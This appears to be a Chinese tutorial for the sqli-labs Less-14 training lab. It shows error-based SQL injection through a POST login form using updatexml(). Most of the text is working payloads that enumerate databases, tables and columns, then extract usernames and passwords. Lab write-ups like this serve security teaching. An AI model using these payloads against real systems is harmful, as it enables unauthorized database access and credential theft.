sqli-labs less-14post报错注入updatexml

post提交报错注入

闭合方式及注入点

利用hackbar举行注入，构造post语句
   uname=aaa"passwd=bbb&Submit=Submit
页面报错，根据分析，闭合方式".
  确定列数

构造
   uname=aaa" or 1=1 # &passwd=bbb&Submit=Submit 确定存在注入
    uname=aaa" order by 3 # &passwd=bbb&Submit=Submit 有报错
uname=aaa" order by 2 # &passwd=bbb&Submit=Submit 无报错，列数2
  回显位置

   uname=aaa" union select 1,2 # &passwd=bbb&Submit=Submit
发现页面没有回显，想到前面 存在报错，想到报错注入
  利用updatexml()函数来举行报错注入
查询数据库与版本等

   

• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select database())),3) # &passwd=bbb&Submit=Submit
  数据库名
  
• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select version())),3) # &passwd=bbb&Submit=Submit
  版本
  

  爆出全部数据库

   

• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1)),3) # &passwd=bbb&Submit=Submit
  
• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1)),3) # &passwd=bbb&Submit=Submit
  通过修改limit函数的值来查询全部的数据库名
  

  爆出全部表名

   

• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),3) # &passwd=bbb&Submit=Submit
  
• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 1,1)),3) # &passwd=bbb&Submit=Submit
  
• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 2,1)),3) # &passwd=bbb&Submit=Submit
  
• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),3) # &passwd=bbb&Submit=Submit
  得到users表
  

  爆出列名

   

• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1)),3) # &passwd=bbb&Submit=Submit
  
• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1)),3) # &passwd=bbb&Submit=Submit
  
• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1)),3) # &passwd=bbb&Submit=Submit
  得到列id,username,password
  

  爆出数据

   

• uname=aaa" union select 1,updatexml(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1)),3) # &passwd=bbb&Submit=Submit
  修改0的值，就可以得到全部的数据
  

  完成，

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。